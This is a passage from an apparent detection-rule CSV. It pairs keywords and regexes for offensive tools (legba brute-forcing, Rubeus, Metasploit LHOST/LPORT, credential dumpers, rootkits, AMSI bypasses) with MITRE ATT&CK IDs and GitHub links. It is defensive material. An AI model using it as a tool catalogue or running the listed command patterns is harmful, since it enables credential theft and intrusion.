enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba http.ntlm1 *",".{0,1000}legba\shttp\.ntlm1\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba http.ntlm2 *",".{0,1000}legba\shttp\.ntlm2\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba imap *--target *",".{0,1000}legba\simap\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba kerberos *--target *",".{0,1000}legba\skerberos\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba kerberos*--kerberos-realm *",".{0,1000}legba\skerberos.{0,1000}\-\-kerberos\-realm\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba ldap *--ldap-domain*",".{0,1000}legba\sldap\s.{0,1000}\-\-ldap\-domain.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba mongodb* --target *",".{0,1000}legba\smongodb.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - 
TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba mssql * --target *",".{0,1000}legba\smssql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba mysql * --target *",".{0,1000}legba\smysql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba pgsql * --target *",".{0,1000}legba\spgsql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba pop3 *--target *",".{0,1000}legba\spop3\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba rdp *--target *",".{0,1000}legba\srdp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - 
TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba sftp *--target *",".{0,1000}legba\ssftp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba smtp *--target *",".{0,1000}legba\ssmtp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba ssh *--target *",".{0,1000}legba\sssh\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba stomp *--target*",".{0,1000}legba\sstomp\s.{0,1000}\-\-target.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba telnet *--telnet-*",".{0,1000}legba\stelnet\s.{0,1000}\-\-telnet\-.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba vnc* --target *",".{0,1000}legba\svnc.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*legba-main.zip*",".{0,1000}legba\-main\.zip.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*lem0nSec/ShellGhost*",".{0,1000}lem0nSec\/ShellGhost.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*lengjibo/FourEye*",".{0,1000}lengjibo\/FourEye.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*Leo4j/Amnesiac*",".{0,1000}Leo4j\/Amnesiac.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Leo4j/Invoke-SMBRemoting*",".{0,1000}Leo4j\/Invoke\-SMBRemoting.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*letmeinbrudipls*",".{0,1000}letmeinbrudipls.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*LetMeOutSharp.*",".{0,1000}LetMeOutSharp\..{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*LetMeowIn.exe*",".{0,1000}LetMeowIn\.exe.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*LetMeowIn-main.zip*",".{0,1000}LetMeowIn\-main\.zip.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*leviathansecurity/TunnelVision*",".{0,1000}leviathansecurity\/TunnelVision.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*lexfo/sshimpanzee*",".{0,1000}lexfo\/sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*LFI scanner checks.jar*",".{0,1000}LFI\sscanner\schecks\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - 
TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*lgandx/Pcredz*",".{0,1000}lgandx\/Pcredz.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","1","N/A","N/A","10","1872","383","2024-01-07T14:17:46Z","2014-04-07T02:03:33Z" "*lgmpcpglpngdoalbgeoldeajfclnhafa*",".{0,1000}lgmpcpglpngdoalbgeoldeajfclnhafa.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*LHOST=* LPORT=*",".{0,1000}LHOST\=.{0,1000}\sLPORT\=.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*liamg/traitor*",".{0,1000}liamg\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*lib/Bruteforcer.cs*",".{0,1000}lib\/Bruteforcer\.cs.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*lib/ForgeTicket.*",".{0,1000}lib\/ForgeTicket\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*lib/S4U.*",".{0,1000}lib\/S4U\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Libbpf-powered rootkit*",".{0,1000}Libbpf\-powered\srootkit.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*LibcRealpathBufferUnderflow/RationalLove.c*",".{0,1000}LibcRealpathBufferUnderflow\/RationalLove\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*libFuzzer-HOWTO.*",".{0,1000}libFuzzer\-HOWTO\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B*",".{0,1000}libnfc_crypto1_crack\sa0a1a2a3a4a5\s0\sA\s4\sB.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*libnspr_nspr_log_file_priv_esc.*",".{0,1000}libnspr_nspr_log_file_priv_esc\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*libreoffice2john.py*",".{0,1000}libreoffice2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*libs/bofalloc*",".{0,1000}libs\/bofalloc.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*libs/bofentry*",".{0,1000}libs\/bofentry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*libs/bofhelper*",".{0,1000}libs\/bofhelper.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*LibSnaffle.ActiveDirectory*",".{0,1000}LibSnaffle\.ActiveDirectory.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","1","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*LibSnaffle.FileDiscovery*",".{0,1000}LibSnaffle\.FileDiscovery.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - 
T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","0","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*libSSH-Authentication-Bypass*",".{0,1000}libSSH\-Authentication\-Bypass.{0,1000}","offensive_tool_keyword","POC","LibSSH Authentication bypass CVE-2018-10933 exploitation tool","T1210 - T1573 - T1553 - T1003 - T1059","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nikhil1232/LibSSH-Authentication-Bypass","1","0","N/A","N/A","1","6","2","2018-12-19T15:46:37Z","2018-12-19T15:33:00Z" "*libxpc_mitm_ssudo.*",".{0,1000}libxpc_mitm_ssudo\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*libxselinux.old*",".{0,1000}libxselinux\.old.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*libxselinux.so*",".{0,1000}libxselinux\.so.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - 
T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*lightsout.py*",".{0,1000}lightsout\.py.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","10","4","304","43","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" "*LightsOut-master.zip*",".{0,1000}LightsOut\-master\.zip.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","10","4","304","43","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" "*ligolo.lan*",".{0,1000}ligolo\.lan.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - 